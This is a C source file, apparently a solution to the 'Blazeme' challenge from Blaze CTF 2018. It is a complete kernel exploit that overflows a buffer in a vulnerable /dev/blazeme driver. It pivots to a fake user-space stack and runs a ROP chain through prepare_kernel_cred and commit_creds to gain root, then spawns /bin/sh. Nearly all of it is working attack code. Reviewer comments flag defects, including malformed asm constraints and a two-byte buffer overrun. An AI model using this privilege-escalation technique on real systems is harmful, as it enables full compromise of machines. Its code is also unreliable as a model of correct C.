Blaze CTF 2018 Blazeme
// gcc -fno-builtin -static -nostdlib -masm=intel exp.c -o exp
#define O_RDWR 0x0002
#define KBUF_LEN (64)
#define PROT_READ 0x1 /* Page can be read. */
#define PROT_WRITE 0x2 /* Page can be written. */
#define MAP_PRIVATE 0x02 /* Changes are private. */
#define MAP_ANONYMOUS 0x20 /* Don't use a file. */
#define MAP_POPULATE 0x8000
#define MAP_FIXED 0x10
#define MAP_GROWSDOWN 0x0100
// syscalls
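/* Raw exit (syscall 60) with status e; never returns.
 * The argument is bound to rdi with an asm constraint instead of assuming the
 * parameter is still sitting in rdi when the syscall instruction runs (which
 * only holds at -O0 with no intervening code). */
void exit(int e) {
    __asm__ volatile("syscall"
                     : /* no outputs */
                     : "a"(60L), "D"((long)e)
                     : "rcx", "r11", "memory");
    __builtin_unreachable();
}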
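/* Raw read (syscall 0): reads at most size bytes from fd into buf.
 * Returns the byte count, or a negative errno value on failure (raw syscall
 * convention; there is no errno variable in a -nostdlib build).
 * Registers are bound explicitly and the result is returned through rax, so the
 * function no longer relies on leftover register state and falls off the end
 * of a non-void function (undefined behaviour). */
int read(int fd, char* buf, int size) {
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "a"(0L), "D"((long)fd), "S"(buf), "d"((long)size)
                     : "rcx", "r11", "memory");
    return (int)ret;
}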
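/* Raw write (syscall 1): writes size bytes from buf to fd.
 * Returns the byte count written, or a negative errno value on failure.
 * Arguments are bound to the syscall registers with constraints and the
 * result is returned explicitly instead of relying on rax by accident. */
int write(int fd, char* buf, int size) {
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "a"(1L), "D"((long)fd), "S"(buf), "d"((long)size)
                     : "rcx", "r11", "memory");
    return (int)ret;
}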
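/* Raw open (syscall 2) of pathname with flags; the mode argument is passed as
 * 0 explicitly (the original left rdx with whatever it happened to hold).
 * Returns a file descriptor, or a negative errno value on failure. */
int open(char* pathname, int flags) {
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "a"(2L), "D"(pathname), "S"((long)flags), "d"(0L)
                     : "rcx", "r11", "memory");
    return (int)ret;
}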
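/* Raw close (syscall 3). Returns 0, or a negative errno value on failure. */
int close(unsigned int fd) {
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "a"(3L), "D"((unsigned long)fd)
                     : "rcx", "r11", "memory");
    return (int)ret;
}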
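/* Raw mmap (syscall 9). Returns the mapping address, or a negative errno value
 * cast to a pointer on failure (the raw convention, no MAP_FAILED here).
 * The SysV C ABI delivers the fourth argument in rcx, but the syscall ABI
 * expects it in r10 (rcx is clobbered by the syscall instruction itself);
 * binding flags/fd/offset to r10/r8/r9 via register variables makes that
 * move explicit instead of hand-written before an unconstrained syscall. */
void *mmap(void *addr, unsigned long length, int prot, int flags, int fd, unsigned long offset) {
    register long r10 __asm__("r10") = flags;
    register long r8 __asm__("r8") = fd;           /* -1 sign-extends, as the kernel expects */
    register unsigned long r9 __asm__("r9") = offset;
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "a"(9L), "D"(addr), "S"(length), "d"((long)prot),
                       "r"(r10), "r"(r8), "r"(r9)
                     : "rcx", "r11", "memory");
    return (void *)ret;
}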
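/* Raw execve (syscall 59). Only returns on failure, with a negative errno
 * value; on success the process image is replaced. */
int execve(char *filename, char *const argv[], char *const envp[]) {
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "a"(59L), "D"(filename), "S"(argv), "d"(envp)
                     : "rcx", "r11", "memory");
    return (int)ret;
}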
// helper functions
/* Length of the NUL-terminated string buf, not counting the terminator.
 * Walks a cursor to the terminator and returns the distance travelled. */
unsigned long strlen(char* buf) {
    char *cursor = buf;
    while (*cursor) {
        cursor++;
    }
    return (unsigned long)(cursor - buf);
}
/* Write buf followed by a newline to stdout (fd 1) using the raw write wrapper.
 * Return values of the two writes are not checked. */
void puts(char *buf) {
    unsigned long len = strlen(buf);
    write(1, buf, len);
    write(1, "\n", 1);
}
/* Fill len bytes starting at s with the byte value c.
 * The build uses -fno-builtin so the compiler cannot turn this loop into a
 * call to memset, i.e. to itself. */
void memset(char* s, int c, unsigned long len) {
    char *end = s + len;
    while (s != end) {
        *s++ = (char)c;
    }
}
/* Replace the process image with /bin/sh (no environment). execve only
 * returns on failure, in which case the process simply exits with 0. */
static void shell() {
    char *argv[] = { "/bin/sh", 0 };
    execve(argv[0], argv, 0);
    exit(0);
}
// ffffffff81063b50 T prepare_kernel_cred
// ffffffff81063960 T commit_creds
// 0xffffffff8109c604: mov esp, 0x01740000 ; ret ; (1 found)
// 0xffffffff811664cc: pop rdi ; ret ; (27 found)
// 0xffffffff81085026: mov rdi, rax ; call rdx ; (12 found)
// 0xffffffff81148e10: pop rdx ; ret ; (19 found)
// 0xffffffff811d20dd: xor rax, rax ; ret ; (26 found)
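/* Kernel text addresses and ROP gadgets, copied from the symbol/gadget listing
 * in the comments above. They are hard-coded for the one kernel build this was
 * written against and are meaningless for any other image. */
unsigned long prepare_kernel_cred = 0xffffffff81063b50;
unsigned long commit_creds = 0xffffffff81063960;
unsigned long pop_rdx = 0xffffffff81148e10;
unsigned long pop_rdi = 0xffffffff811664cc;
unsigned long mov_rdi_rax_call_rdx = 0xffffffff81085026;
unsigned long xor_rax_ret = 0xffffffff811d20dd;
unsigned long pivot_gadget = 0xffffffff8109c604;   /* mov esp, 0x01740000 ; ret */
/* User-mode CS, SS and RFLAGS: written by save_state(), read by restore_state()
 * when it builds the iretq frame. */
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
/* Address of shell() as an integer so restore_state() can place it in the
 * iretq frame from inline asm. The cast is explicit: initializing an integer
 * from a function pointer without one is a constraint violation in C. */
unsigned long shell_v = (unsigned long)shell;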
/* Capture the user-mode CS and SS selectors and RFLAGS into the globals above,
 * so restore_state() can later build an iretq frame that lands back in ring 3.
 * NOTE(review): the operand constraints are spelled "r=" -- GCC expects the
 * '=' modifier first ("=r"), and the matching "r" input that re-reads each
 * global is unnecessary. pushfq and popq are two separate asm statements, so
 * this relies on the compiler emitting nothing that touches the stack between
 * them. */
static void save_state() {
__asm__("mov %0, cs": "r=" (user_cs) : "r" (user_cs));
__asm__("mov %0, ss": "r=" (user_ss) : "r" (user_ss));
__asm__("pushfq");
__asm__("popq %0": "r=" (user_rflags) : "r" (user_rflags));
}
/* Final link of the kernel-mode chain: swap back to the user GS base and
 * return to ring 3 with iretq. The five qwords written at [rsp] are the iretq
 * frame, in hardware order:
 *   [rsp+0x00] RIP    = shell_v     (user-mode shell())
 *   [rsp+0x08] CS     = user_cs
 *   [rsp+0x10] RFLAGS = user_rflags
 *   [rsp+0x18] RSP    = 0x01740000  (inside the region _start maps for the fake stack)
 *   [rsp+0x20] SS     = user_ss
 * NOTE(review): the globals are only read here yet are bound as "r=" outputs;
 * plain "r" inputs would describe the usage. rax is written by a separate asm
 * statement without being declared as clobbered. */
static void restore_state() {
__asm__("swapgs");
__asm__("mov [rsp+0x20], %0": "r=" (user_ss) : "r" (user_ss));
__asm__("mov rax, 0x01740000");
__asm__("mov [rsp+0x18], rax");
__asm__("mov [rsp+0x10], %0": "r=" (user_rflags) : "r" (user_rflags));
__asm__("mov [rsp+0x08], %0": "r=" (user_cs) : "r" (user_cs));
__asm__("mov [rsp+0x00], %0": "r=" (shell_v) : "r" (shell_v));
__asm__("iretq");
}
/* Program entry (-nostdlib, so there is no libc main). In order:
 *   1. save the user-mode segment state for the eventual return to ring 3;
 *   2. open the vulnerable device;
 *   3. map a fake stack at a fixed address and lay the ROP chain out at
 *      0x01740000, the value the pivot gadget loads into esp;
 *   4. write a 64-byte buffer of pivot-gadget addresses to the device.
 * NOTE(review): the chain returns into user-space code (restore_state) and
 * runs on a user-space stack; SMEP/SMAP would block both, and the page does
 * not state the kernel's configuration. */
void _start(void) {
int fd;
char buf[KBUF_LEN];
int i;
unsigned long* fake_stack;
save_state();
/* Raw syscall wrapper: a failure is a negative errno value, hence the < 0 test. */
fd = open("/dev/blazeme", O_RDWR);
if (fd < 0) {
puts("open() failure");
exit(1);
}
/* Two pages at 0x0173f000. 0x32 == MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED (the
 * named macros above would read better); MAP_POPULATE pre-faults the pages.
 * NOTE(review): an integer is passed where mmap() takes void *addr. */
fake_stack = mmap(0x01740000 - 0x1000, 0x2000, PROT_READ|PROT_WRITE, 0x32 | MAP_POPULATE, -1, 0);
/* Skip the first page so the chain starts exactly at 0x01740000. */
fake_stack += (0x1000/ sizeof(unsigned long));
/* ROP chain, consumed from 0x01740000 once the pivot gadget has run:
 *   pop rdi ; 0 ; prepare_kernel_cred      -> prepare_kernel_cred(0), rax = cred
 *   pop rdx ; commit_creds+6 ; mov rdi, rax ; call rdx
 *       (the +6 presumably skips commit_creds' first instructions -- not
 *       explained on the page; confirm against the disassembly)
 *   xor rax, rax ; ret                      -> zero return value
 *   restore_state                           -> iretq back to shell()
 * NOTE(review): a function pointer is stored into unsigned long without a cast
 * on the last line. */
*fake_stack ++= pop_rdi;
*fake_stack ++= 0;
*fake_stack ++= prepare_kernel_cred;
*fake_stack ++= pop_rdx;
*fake_stack ++= commit_creds + 6;
*fake_stack ++= mov_rdi_rax_call_rdx;
*fake_stack ++= xor_rax_ret;
*fake_stack ++= restore_state;
/* Payload: two filler bytes, then the pivot gadget repeated as qwords from
 * buf+2 (why the 2-byte offset is needed is not stated on the page).
 * NOTE(review): KBUF_LEN/8 == 8 iterations write qwords at buf+2 .. buf+65,
 * so the last one runs two bytes past the 64-byte buffer. */
memset(buf, 'a', 2);
for (i = 0; i<KBUF_LEN/8 ; i++) {
unsigned long *p = (unsigned long*)(buf+2+i*8);
*p = pivot_gadget;
}
/* Trigger repeatedly; the page does not say why a single write is not enough.
 * The exit() below is unreachable. */
while (1) {
write(fd, buf, KBUF_LEN);
}
exit(0);
}